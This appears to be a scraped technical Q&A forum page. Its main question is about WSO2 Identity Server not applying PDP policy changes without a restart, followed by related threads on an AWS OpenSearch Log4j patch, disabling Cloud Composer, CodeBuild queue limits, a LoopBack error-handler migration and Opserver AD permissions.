After adding a new policy and disabling an outdated policy at the PDP console, an action that displays correctly at the PDP Policy view, the connected PDP process using a Java client did not reflect the logic added by the new policy, still acting according to the older, disabled rules. We also tried to run "Clear Decision Cache" and" Clear Attribute Cache" widgets at the PDP Extension screen, and the PEP is still showing the same issue.
A graceful restart of the WSO2 did solve the error. The server is running WSO2 5.1 release. From an operational standpoint, the restart command is a rather disruptive action and should be avoided.
Are further configuration, or command options available at the WSO2 IS package to drop cache and dynamically refresh an active policy without causing disruption of ongoing services?
This is already tested and working scenario in 5.1.0.
As I understood, you wanted to edit a policy and should reflect that changes after you publish that new policy without doing any other operation, right ? Yes, when you publish a same policy again with new changes, it will replace the new policy in DB and cache in cluster as well. It should reflect at that time.
Actually the scenario described by Harsha is not the same as the one Claude asked. Changing the policy and publishing might work. But disabling or even deleting a policy from the PDP does not become effective unless the server is restarted.
There is a new ticket in jira:
Disabling/Deleting Policy from PDP Configuration does not work
Related
ElasticSearch itself should be safe, because of the Java Security Manager settings. We're not using logging anyway, so even if those settings are disturbed, we might not be sending anything to the logger.
But Amazon has still issued a log4j patch for our instance -- after several days now. The patch (R20211203-P2) could just be upgrading to log4j2.15. Or maybe there's some other logger in the control plane we can't see that it is securing?
We have tried requests containing common exploit strings and we do not see any requests coming to our target.
Were we safe before patch R20211203-P2 arrived? Does anyone know what R20211203-P2 actually does? There are no release notes.
Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.
So yeah I would upgrade ASAP just in case.
I have been trying to find a way to save on the costs of Airflow by disabling it when not in use. I have discovered that if we disable the composer.googleapis.com service while not in use that Google does not charge for the service while it is disabled, although it does continue to charge for other resources that are still active. Unfortunately, if the service is disabled for more than an hour or so, the service is not usable after re-enabling it. After the service has been disabled for an extended period of time, the Composer Environment Details Page shows
An error occurred with retrieving the last operation on this environment
and
This environment cannot be edited due to the errors that occurred during environment creation/update. Please investigate the logs to determine the cause, or create a new environment.
And gcloud composer environments describe shows state: ERROR
The one error that I did see in the logs was due to a duplicate key when the airflow_monitoring DAG was rescheduled after a little over an hour. Therefore, created a new Composer environment, disabled all DAGs, disabled the composer service, waited a while, then enabled it again. The environment was once again in an error state.
The Cloud Composer documentation states:
If you disable the Cloud Composer API, environments become unusable within an hour of service deactivation unless you re-enable the API. If you re-enable the API, you are billed for the service usage that occurs while the Cloud Composer service is deactivating.
Maybe this is poorly worded, but to me it sounds like it would become unusable within an hour if you disable it, but if you re-enabled it anytime later, it will become usable again. I am wondering if it really means that if you disable it, you must re-enable it within 1 hour or it will become permanently unusable.
Is there a way to disable the composer.googleapis.com service for longer than an hour and then get it working again after the service has been re-enabled? Is there something I can restart, or some way to clear the error state? Is there more I should do before disabling it?
I am using composer-1.10.4-airflow-1.10.6 with Python 3.
Thanks.
No, there is no way to disable the composer.googleapis.com service for more than an hour and then have environments be functional after re-enablement.
GCP services are not meant to be enabled/disabled on the fly in this manner, and disablement of a service is meant to be performed with the intention of disabling it for the long term. Keeping a service disabled for long enough means Google-managed components created for the service (specifically for your project) will be decommissioned, and in Composer's case, this will render your environments permanently unusable.
The error state in the environment cannot be cleared. If you want to save on costs, you should delete Composer environments as opposed to deactivating the service entirely. The "service" is not cluster-like and isn't meant to be toggled on and off.
I'm newbie in AWS, with my free tier account I'm trying to build my nodeJS project with AWS CodeBuild but I get this error:
Build failed to start The build failed to start. The following error occured: Cannot have more than 0 builds in queue for the account
I followed the simple aws tutorial, leaving all default settings for let aws create all service, image etc for me.
Also I stored source code in a AwsCodeCommit repository.
Could anybody help me?
In my case, there was a security vulnerability in my account and AWS automatically raised a support ticket and suspended all resources that were linked to it. I had to fix it and then on chat with aws support they resumed my service.
I've seen a lot of answers around the web suggesting to call support, which is a great idea, but I was actually able to get around this on my own.
As the root user I went in and put in a current credit card. The one that was currently there was expired. I then deleted my CodeBuild project and create a new one. Now my builds work! It makes sense that AWS just needed a valid payment method before it allowed me to use premium services.
My solution may not work for you, but sure I hope it does!
My error was Project-level concurrent build limit cannot exceed the account-level concurrent build limit of 1 when I tried to increase the Concurrent build limit under checkbox Restrict number of concurrent builds this project can start in CodeBuild Project Configuration. I resolved it by writing to support to increase the limit. They increased it to 20 and it works now as expected. They increased it even though I'm on Basic plan on AWS if anyone's wondering.
My solution was to add new service role name and the concurrent build to 1. This worked
I think your issue is resolved at the moment. Any way I faced the same issue. In my case I had a "code build project" connecting to a GitHub repository. And then I added AWS Access Key and Secret hard coding the buildspec.yml file. With this AWS identified it as an unauthorized login. So they added security restrictions to the resources while opening a support issue. In such a case you can look for the emails from AWS in which they explain the reason for this behavior and the steps to get this corrected.
I created a API Connect project with command
apic loopback
When I try to launch the API designer, I receive error as below:
sdil#sdil-VirtualBox:~/Project/test-apic/todo4$ apic edit
The user model "User" is attached to an application that does not specify
whether other sessions should be invalidated when a password or
an email has changed. Session invalidation is important for security
reasons as it allows users to recover from various account breach
situations.
We recommend turning this feature on by setting
"logoutSessionsOnSensitiveChanges" to true in
server/config.json (unless you have implemented your own solution
for token invalidation).
We also recommend enabling "injectOptionsFromRemoteContext" in
User's settings (typically via common/models/*.json file).
This setting is required for the invalidation algorithm to keep
the current session valid.
Learn more in our documentation at
https://loopback.io/doc/en/lb2/AccessToken-invalidation.html
Error: loopback.errorHandler is no longer available. Please use the module "strong-error-handler" instead.
When I check for declaration in package.json, I did see strong-error-handler written.
"dependencies": {
...
"strong-error-handler": "^2.0.0",
}
How do i fix this to make API Designer running?
I sort of recognize this problem, actually. We had the new strong-error-handler but also the old one active.
Do the steps in "Migration from old LoopBack error handler" here:
https://loopback.io/doc/en/lb3/Using-strong-error-handler.html#migration-from-old-loopback-error-handler
Should eliminate the old one completely.
I've deployed a copy of opserver, and it is working perfectly when using alladmin as the security setting. However, once I switch it to ad and configure the groups, the SQL tab goes away and I get an access denied message if I try browsing directly to it. The dashboard still displays all Solar Winds data as expected.
The build I'm using is actually from November. I tried a more recent build, but I lose the network information from Solar Winds (the CPU and Mem graphs show, but Net is all blank)
Is there a separate place to configure the SQL permissions that I'm missing?
I think perhaps there was some caching going on for the hub that wasn't happening for the provider, because they are both working now. Since it was a new security group, perhaps it hadn't replicated yet (causing the SQL auth to fail) but the dashboard provider was still using the previous authentication?
I also did discover a neat option while researching this though - the GitHub page mentions that you can also specify security at a provider level in the JSON using the AdminGroups and ViewGroups properties!